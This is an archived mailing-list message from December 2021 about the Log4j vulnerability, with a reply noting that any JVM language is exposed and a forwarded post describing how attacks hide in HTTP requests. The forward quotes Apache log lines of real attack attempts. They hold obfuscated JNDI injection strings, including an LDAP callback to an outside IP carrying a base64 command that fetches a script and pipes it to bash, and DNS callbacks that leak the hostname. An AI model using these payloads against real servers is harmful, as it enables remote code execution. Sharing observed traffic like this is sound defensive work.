From mboxrd@z Thu Jan 1 00:00:00 1970 Return-Path: Received: from mail.lang.hm (unknown [66.167.227.145]) (using TLSv1.2 with cipher ADH-AES256-GCM-SHA384 (256/256 bits)) (No client certificate requested) by lists.bufferbloat.net (Postfix) with ESMTPS id 3CB993B29E for ; Mon, 13 Dec 2021 14:42:17 -0500 (EST) Received: from dlang-mobile (unknown [10.2.2.69]) by mail.lang.hm (Postfix) with ESMTP id 2A4D6116458; Mon, 13 Dec 2021 11:42:16 -0800 (PST) Date: Mon, 13 Dec 2021 11:42:16 -0800 (PST) From: David Lang To: Dave Taht cc: bloat In-Reply-To: Message-ID: <611o1o7-43r1-2q78-n69o-2ps7opq2rp8@ynat.uz> References: <9c4dc5e1-b35d-6a62-a8fc-cac729f585d1@foobar.org> <002401d7f00f$c4fa1b60$4eee5220$@ddostest.me> <41BB6B27-4870-49F2-BD83-354692A01081@ip-clear.de> <002901d7f012$24093620$6c1ba260$@ddostest.me> <003a01d7f014$fd8c6e10$f8a54a30$@ddostest.me> <12CBBEBF-6B38-4924-AA86-E5E94D77513E@ip-clear.de> MIME-Version: 1.0 Content-Type: multipart/mixed; boundary="228850167-70412986-1639424536=:6914" Subject: Re: [Bloat] Fwd: Log4j mitigation X-BeenThere: bloat@lists.bufferbloat.net X-Mailman-Version: 2.1.20 Precedence: list List-Id: General list for discussing Bufferbloat List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Mon, 13 Dec 2021 19:42:17 -0000 This message is in MIME format. The first part should be readable text, while the remaining parts are likely unreadable without MIME-aware tools. --228850167-70412986-1639424536=:6914 Content-Type: text/plain; charset=utf-8; format=flowed Content-Transfer-Encoding: 8BIT Just a note that this doesn't require the code to be written in Java, any language that runs in a jvm can end up having grief. David Lang On Mon, 13 Dec 2021, Dave Taht wrote: > Date: Mon, 13 Dec 2021 05:56:36 -0800 > From: Dave Taht > To: bloat > Subject: [Bloat] Fwd: Log4j mitigation > > for those of you losing sleep over the java logging exploit, my heart > goes out to you. > > While I'm glad I, personally, and on the bufferbloat related websites, > haven't got a single thing written in java, and I lost 3 weeks of my > life over christmas to spectre, and several weeks per year - and > usually, right around christmas! coping with other CVE's.... this one > seems so big and affecting so many other services I use, that I just > kind of want to take all my cash out of the bank, and log out, and > find a tropic island somewhere. > > ---------- Forwarded message --------- > From: Jörg Kost > Date: Mon, Dec 13, 2021 at 3:43 AM > Subject: Re: Log4j mitigation > To: Jean St-Laurent > Cc: > > > You can't see it. The attack vector can hide in HTTP GETs, Posts (SSL), > in Headers, in anything related to where a Java process does logging > with Log4j; it's innumerable. It might even evaluate from a URI itself; > it won't use a fixed port. It's not wormy right now, but maybe it will > soon. > > We are seeing things like this since 10th of Dec. And this is only a > typical Apache Logfile for HTTP/HTTPS, where we do logging: > > ${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNzguMjQ4LjI0Mi4xNDE6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMTc4LjI0OC4yNDIuMTQxOjgwKXxiYXNo} > GET /$%7Bjndi:dns://45.83.64.1/securityscan-http80%7D HTTP/1.1" 301 281 > "${jndi:dns://45.83.64.1/securityscan-http80}" > "${jndi:dns://45.83.64.1/securityscan-http80} > GET > /?x=${jndi:ldap://${hostName}.c6rip779l9hq8g7hluigcg5131oyyyt8e.interactsh.com/a} > HTTP/1.1" 200 - > "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://${hostName}.c6rip779l9hq8g7hluigcg5131oyyyt8e.interactsh.com}" > "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://${hostName}.c6rip779l9hq8g7hluigcg5131oyyyt8e.interactsh.com} > > > > -- > I tried to build a better future, a few times: > https://wayforward.archive.org/?site=https%3A%2F%2Fwww.icei.org > > Dave Täht CEO, TekLibre, LLC > _______________________________________________ > Bloat mailing list > Bloat@lists.bufferbloat.net > https://lists.bufferbloat.net/listinfo/bloat --228850167-70412986-1639424536=:6914--